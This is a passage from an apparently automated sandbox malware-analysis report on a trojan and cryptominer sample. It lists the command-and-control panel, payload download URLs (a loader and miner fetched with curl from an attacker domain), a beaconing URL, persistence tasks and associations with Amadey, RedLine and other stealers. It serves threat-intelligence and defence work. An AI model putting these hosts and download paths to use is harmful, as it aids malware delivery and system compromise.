                                                        		unknown
                                                        https://eijfrhegrtbrfcd.online/download/conf1.phpecurl.exe, 0000000A.00000002.2354249733.00000212B53B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://eijfrhegrtbrfcd.online/Aloader_5879465914.exe, 00000007.00000002.3021798885.0000000003750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://185.215.113.16/ViewSizePreferences.SourceAumid2axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://185.215.113.16/Jo89Ku7d/index.phpN7axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                		unknown
                                                                https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resourcesvchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkMicrosoft-Edge.exe, 0000000E.00000003.2439702684.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2550111525.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000002.3020533522.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2412607559.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2619479146.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2605563246.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2669985845.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2564142044.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426458006.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2577879379.0000000000914000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://github.comsvchost64.exe, 0000008B.00000002.2788969573.000000000375D000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000357C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.w3.sihost64.exe, 0000009F.00000002.2836528294.00000000032D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zsvchost64.exe, 0000008B.00000002.2788969573.0000000003780000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000359F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://eijfrhegrtbrfcd.online/0loader_5879465914.exe, 00000007.00000003.2550392048.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3020183902.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2438846550.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2467127699.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2426102539.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2793911920.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2635393911.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2766846263.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2373865784.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2481291707.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2620255870.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2453484354.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2508746813.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2673880736.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2399949653.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2522344856.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2689820350.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2358547789.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2386863025.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2648797169.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2412212318.0000000000778000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://185.215.113.16/Jo89Ku7d/index.php/dnaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              		unknown
                                                                              https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrigsvchost64.exe, 00000095.00000002.2847173181.0000000003510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://185.215.113.16/Jo89Ku7d/index.phpr7faxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  		unknown
                                                                                  http://185.215.113.16/Jo89Ku7d/index.php=axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    		unknown
                                                                                    http://185.215.113.16/inc/loader_5879465914.exehaxplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://185.215.113.16/Jo89Ku7d/index.phpdedAaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                        		unknown
                                                                                        http://185.215.113.16/taxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://185.215.113.16/Jo89Ku7d/index.phpnuaxplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost64.exe, 0000006B.00000002.2706597636.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 00000090.00000002.2783114203.0000000003221000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 0000009F.00000002.2836528294.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://185.215.113.16/Jo89Ku7d/index.php&7:axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              		unknown
                                                                                              http://185.215.113.16/Jo89Ku7d/index.php4axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                		unknown
                                                                                                http://185.215.113.16/Jo89Ku7d/index.php/axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                  		unknown
                                                                                                  http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                    		unknown
                                                                                                    http://185.215.113.16/Localaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://185.215.113.16/Jo89Ku7d/index.phpmaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                        		unknown
                                                                                                        http://185.215.113.16/Jo89Ku7d/index.php:7.axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          		unknown
                                                                                                          http://185.215.113.16/15.113.16/axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://185.215.113.16/Jo89Ku7d/index.phpncoded&axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                              		unknown
                                                                                                              http://185.215.113.16/inc/loader_5879465914.exeaxplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://185.215.113.16/Jo89Ku7d/index.phpncoded3axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                  		unknown
                                                                                                                  http://185.215.113.16/Jo89Ku7d/index.phpncoded4axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                    		unknown
                                                                                                                    http://185.215.113.16/15.113.16/System32axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://185.215.113.16/Jo89Ku7d/index.phpF6Zaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                        		unknown
                                                                                                                        http://185.215.113.16/Jo89Ku7d/index.phpWindowsaxplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                          		unknown
                                                                                                                          http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            		unknown
                                                                                                                            http://185.215.113.16/axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://185.215.113.16/ysWOW64axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://eijfrhegrtbrfcd.online/download/conf1.phpycurl.exe, 0000000A.00000002.2354315506.00000212B53EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2353963310.00000212B53EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://eijfrhegrtbrfcd.online/loader_5879465914.exe, 00000007.00000003.2741556491.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2724634660.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2791232817.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2894492934.000000000378D000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2857988717.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2763069351.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2908398363.0000000003788000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2949314469.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2867639993.000000000378E000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3022068193.0000000003799000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2590705590.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2742582676.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2864099579.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2832045972.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2399904766.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2879187208.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2510316366.000000000088E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                    		unknown
                                                                                                                                    https://sanctam.net:58899svchost64.exe, 0000008B.00000002.2788969573.00000000036ED000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.0000000003736000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003554000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://185.215.113.16/Wiowaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://185.215.113.16/onesaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://185.215.113.16/Jo89Ku7d/index.phpB7Vaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                            		unknown
                                                                                                                                            http://185.215.113.16/Jo89Ku7d/index.phper_5879465914.exeaxplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                              		unknown
                                                                                                                                              http://185.215.113.16/4axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.phpM6axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  		unknown
                                                                                                                                                  https://eijfrhegrtbrfcd.online:443/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1loader_5879465914.exe, 00000007.00000003.2632263244.000000000377B000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2425064392.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481189507.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2496432695.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481058326.0000000003743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://185.215.113.16/7737D9ECF5C72AA370644axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://185.215.113.16/Jo89Ku7d/index.phpncodedJaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                        		unknown
                                                                                                                                                        https://eijfrhegrtbrfcd.online/download/miner2.0.exePzcurl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown

                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public IPs

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          172.67.187.100
                                                                                                                                                          		eijfrhegrtbrfcd.onlineUnited States
                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                          185.215.113.16
                                                                                                                                                          		unknownPortugal
                                                                                                                                                          		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                          140.82.121.3
                                                                                                                                                          		github.comUnited States
                                                                                                                                                          		36459GITHUBUSfalse

                                                                                                                                                          Private

                                                                                                                                                          IP
                                                                                                                                                          127.0.0.1

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                          Analysis ID:1520638
                                                                                                                                                          Start date and time:2024-09-27 17:40:07 +02:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 12m 0s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:208
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample name:file.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.spyw.evad.mine.winEXE@314/69@4/4
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 15.4%
                                                                                                                                                          HCA Information:Failed
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                          Warnings

                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                          • Execution Graph export aborted for target axplong.exe, PID 7712 because there are no executed function
                                                                                                                                                          • Execution Graph export aborted for target axplong.exe, PID 7728 because there are no executed function
                                                                                                                                                          • Execution Graph export aborted for target file.exe, PID 7528 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target miner2.0.exe, PID 5868 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target services64.exe, PID 6264 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target services64.exe, PID 6976 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target sihost64.exe, PID 7008 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target sihost64.exe, PID 7844 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target svchost64.exe, PID 5992 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target svchost64.exe, PID 6772 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target svchost64.exe, PID 7732 because it is empty
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          • VT rate limit hit for: file.exe

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          11:42:01API Interceptor585084x Sleep call for process: axplong.exe modified
                                                                                                                                                          11:42:06API Interceptor82x Sleep call for process: loader_5879465914.exe modified
                                                                                                                                                          11:42:09API Interceptor58x Sleep call for process: Microsoft-Edge.exe modified
                                                                                                                                                          11:42:34API Interceptor211x Sleep call for process: powershell.exe modified
                                                                                                                                                          11:42:47API Interceptor21x Sleep call for process: svchost64.exe modified
                                                                                                                                                          11:42:47API Interceptor6x Sleep call for process: sihost64.exe modified
                                                                                                                                                          16:41:04Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                          16:42:07Task SchedulerRun new task: Microsoft Edge path: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                          16:42:39Task SchedulerRun new task: services64 path: "C:\Windows\system32\services64.exe"

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          172.67.187.100INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                          185.215.113.16file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                          8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                                                                                                                                          • 185.215.113.16/soka/random.exe
                                                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                          140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                          • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                                                                                                                                                          firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                          • github.com/john-xor/temp/blob/main/index.html?raw=true
                                                                                                                                                          0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                                                                                                                                                          • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                                                                                                                                          MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                                                                                                                                                          • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                                                                                                                                          RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                                                                                                                                          • github.com/ssbb36/stv/raw/main/5.mp3

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          eijfrhegrtbrfcd.onlinefile.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                          • 104.21.64.194
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.64.194
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.64.194
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.64.194
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.64.194
                                                                                                                                                          github.comPO#518464.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                          • 140.82.121.4
                                                                                                                                                          PO#518464.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                          • 140.82.121.4
                                                                                                                                                          Proof Of Payment.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          Product Specification Wire-Mesh RQF 260924.sc.exeGet hashmaliciousSTRRATBrowse
                                                                                                                                                          • 140.82.121.3

                                                                                                                                                          ASNs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          GITHUBUShttps://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.5-1/rubyinstaller-devkit-3.3.5-1-x64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 140.82.121.4
                                                                                                                                                          PO#518464.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                          • 140.82.121.4
                                                                                                                                                          PO#518464.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                          • 140.82.121.4
                                                                                                                                                          Proof Of Payment.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                          • 140.82.121.4
                                                                                                                                                          https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.5-1/rubyinstaller-devkit-3.3.5-1-x64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 140.82.121.4
                                                                                                                                                          https://telagremn.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 140.82.114.22
                                                                                                                                                          https://arjunshaw.github.io/4.7-Project-1-Netflix-/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 140.82.112.21
                                                                                                                                                          http://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 140.82.114.22
                                                                                                                                                          Product Specification Wire-Mesh RQF 260924.sc.exeGet hashmaliciousSTRRATBrowse
                                                                                                                                                          • 140.82.121.4
                                                                                                                                                          https://tokenp0kczt.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 140.82.121.6
                                                                                                                                                          CLOUDFLARENETUSSecuriteInfo.com.Trojan.PackedNET.3065.20099.26130.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 172.67.74.152
                                                                                                                                                          Quote #270924.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • 172.67.165.25
                                                                                                                                                          https://effective-teammates-567500.framer.app/Get hashmaliciousHTMLPhisherBrowse
